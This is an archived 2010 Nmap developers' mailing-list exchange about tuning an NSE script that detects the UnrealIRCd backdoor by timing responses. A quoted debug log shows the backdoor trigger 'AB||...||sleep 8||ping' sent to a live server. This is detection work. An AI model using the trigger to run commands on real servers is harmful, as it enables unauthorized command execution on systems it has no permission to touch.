Nmap Development mailing list archives

Re: Always practice safe software: a lesson from UnrealIRCd

From: Ron <ron () skullsecurity net>
Date: Thu, 24 Jun 2010 10:05:04 -0500

The attached version of the code, in my testing, had no false positives and no false negatives. The downside is, it's 
incredibly slow. 

A mutex + 10 second delay and 20 second timeout had 5 good, 1 false positive. A mutex + 25 second delay + 35 second 
timeout = perfect, 5 out of 5 on my test list with no false positives/negatives. So basically, 25 seconds for every 
infected host, 35 seconds for every host that times out, and basically no time for hosts that aren't affected either 
way. 

Something that would be useful here would be a semaphore -- let 3 or 4 go in parallel, but no more. I don't think we 
have that capability right now, though, and I'm not sure if that would ruin our results. 

Thoughts?

On Wed, 23 Jun 2010 18:38:05 -0600 David Fifield
<david () bamsoftware com> wrote:

On Wed, Jun 23, 2010 at 07:21:23PM -0500, Ron wrote:

I found a better way to detect vulnerable servers, but unfortunately
it isn't something an average person can do (requires a DNS
authoritative server).

From the original list, with a 20 second delay and 40 second
timeout,

on the list you provided earlier, I found:
o 4 vulnerable servers
o 3 were discovered
o 1 false positive
o 1 was missed because of 'too many reconnects'

So, that isn't very good. We can make the delays even longer, and I
think it'll get rather accurate, but I don't think that's ideal,
either. I'm going to give mutex a shot, still.


Ah, so the timing is accurate enough, but it's not really an accurate
reflection of whether the vulnerability exists. I tried using
irc-unrealircd-backdoor.command to ping a server, and against all the
9- and 11-second hosts, a vulnerability was detected but I didn't
receive any pings.

It looks like the delay is really being caused by a lack of an auth
response.

Discovered open port 6667/tcp on 91.121.137.140
NSE: Starting irc-unrealircd-backdoor against 91.121.137.140:6667.
NSOCK (0.5030s) TCP connection requested to 91.121.137.140:6667 (IOD
#2) EID 16 NSOCK (0.6610s) Callback: CONNECT SUCCESS for EID 16
#[91.121.137.140:6667]
NSE: TCP 192.168.0.21:47629 > 91.121.137.140:6667 | CONNECT
NSE: TCP 192.168.0.21:47629 > 91.121.137.140:6667 | AB||
SOMETHINGUNIQUE||sleep 8||ping -n 9 127.0.0.1 NSOCK (0.6700s) Write
SOMETHINGUNIQUE||request for 50 bytes to IOD #2 EID 75
SOMETHINGUNIQUE||[91.121.137.140:6667]: AB||SOMETHINGUNIQUE||sleep 8||
SOMETHINGUNIQUE||ping -n 9 127.0.0.1.
NSOCK (0.6700s) Callback: WRITE SUCCESS for EID 75
[91.121.137.140:6667] NSOCK (0.6900s) Read request from IOD #2
[91.121.137.140:6667] (timeout: 20000ms) EID 106 NSOCK (0.8180s)
Callback: READ SUCCESS for EID 106 [91.121.137.140:6667] (122 bytes)
NSE: TCP 192.168.0.21:47629 < 91.121.137.140:6667
| :Gioia.OceanIRC.net NOTICE AUTH :*** Looking up your hostname...
| NSOCK (0.8420s) Read request from IOD #2 [91.121.137.140:6667]
| (timeout: 20000ms) EID 154 NSOCK (0.9770s) Callback: READ SUCCESS
| for EID 154 [91.121.137.140:6667] (100 bytes)
NSE: TCP 192.168.0.21:47629 < 91.121.137.140:6667
| :Gioia.OceanIRC.net NOTICE AUTH :*** Couldn't resolve your
| hostname; using your IP address instead NSOCK (0.9940s) Read
| request from IOD #2 [91.121.137.140:6667] (timeout: 20000ms) EID 178
NSOCK (12.4170s) Callback: READ SUCCESS for EID 178
[91.121.137.140:6667] (82 bytes) NSE: TCP 192.168.0.21:47629 <
91.121.137.140:6667 | :Gioia.OceanIRC.net NOTICE AUTH :*** No ident
response; username prefixed with ~ NSOCK (12.4170s) Read request from
IOD #2 [91.121.137.140:6667] (timeout: 20000ms) EID 274 NSOCK
(12.5740s) Callback: READ SUCCESS for EID 274 [91.121.137.140:6667]
(77 bytes): :Gioia.OceanIRC.net 451 AB||SOMETHINGUNIQUE||sleep :You
have not registered.. NSE: TCP 192.168.0.21:47629 <
91.121.137.140:6667 | :Gioia.OceanIRC.net 451 AB||SOMETHINGUNIQUE||
sleep :You have not registered

David Fifield
_______________________________________________
Sent through the nmap-dev mailing list
http://cgi.insecure.org/mailman/listinfo/nmap-dev
Archived at http://seclists.org/nmap-dev/



-- 
Ron Bowes
http://www.skullsecurity.org
http://www.twitter.com/iagox86

Attachment: irc-unrealircd-backdoor.nse
Description:

Attachment: _bin
Description:

_______________________________________________
Sent through the nmap-dev mailing list
http://cgi.insecure.org/mailman/listinfo/nmap-dev
Archived at http://seclists.org/nmap-dev/

Current thread:

Re: Always practice safe software: a lesson from UnrealIRCd, (continued)
- - - Re: Always practice safe software: a lesson from UnrealIRCd Ron (Jun 14)
    - Re: Always practice safe software: a lesson from UnrealIRCd David Fifield (Jun 18)
    - Re: Always practice safe software: a lesson from UnrealIRCd Ron (Jun 22)
    - Re: Always practice safe software: a lesson from UnrealIRCd David Fifield (Jun 22)
    - Re: Always practice safe software: a lesson from UnrealIRCd Ron (Jun 22)
    - Re: Always practice safe software: a lesson from UnrealIRCd Ron (Jun 22)
    - Re: Always practice safe software: a lesson from UnrealIRCd David Fifield (Jun 23)
    - Re: Always practice safe software: a lesson from UnrealIRCd David Fifield (Jun 23)
    - Re: Always practice safe software: a lesson from UnrealIRCd Ron (Jun 23)
    - Re: Always practice safe software: a lesson from UnrealIRCd David Fifield (Jun 23)
    - Re: Always practice safe software: a lesson from UnrealIRCd Ron (Jun 24)
    - Re: Always practice safe software: a lesson from UnrealIRCd Patrick Donnelly (Jun 24)
    - Re: Always practice safe software: a lesson from UnrealIRCd David Fifield (Jun 25)
    - Re: Always practice safe software: a lesson from UnrealIRCd Ron (Jun 25)
    - Re: Always practice safe software: a lesson from UnrealIRCd David Fifield (Jun 30)
    - Re: Always practice safe software: a lesson from UnrealIRCd Vlatko Kosturjak (Jun 13)